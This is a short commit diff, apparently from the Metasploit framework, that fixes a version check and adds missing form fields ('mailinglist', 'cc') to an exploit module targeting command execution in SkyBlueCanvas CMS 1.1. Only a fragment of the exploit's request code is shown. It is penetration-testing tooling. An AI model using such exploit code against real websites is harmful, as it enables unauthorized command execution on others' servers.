Land rapid7#7325, Fix missing form inputs in skybluecanvas_exec

Brent Cook · Brent Cook · commit 90f0eec39048 · 2016-09-15T19:55:32.000-05:00
diff --git a/modules/exploits/unix/webapp/skybluecanvas_exec.rb b/modules/exploits/unix/webapp/skybluecanvas_exec.rb
@@ -65,7 +65,7 @@ def check
 
     res = send_request_raw('uri' => uri)
 
-    if res and res.body =~ /[1.1 r248]/
+    if res && res.body.include?('SkyBlueCanvas [1.1 r248]')
       vprint_good("SkyBlueCanvas CMS 1.1 r248-xx found")
       return Exploit::CheckCode::Appears
     end
@@ -89,7 +89,9 @@ def exploit
           'email' => rand_text_alphanumeric(10),
           'subject' => rand_text_alphanumeric(10),
           'message' => rand_text_alphanumeric(10),
-          'action' => 'Send'
+          'action' => 'Send',
+          'mailinglist' => '0',
+          'cc' => '0'
         }
     })
   end
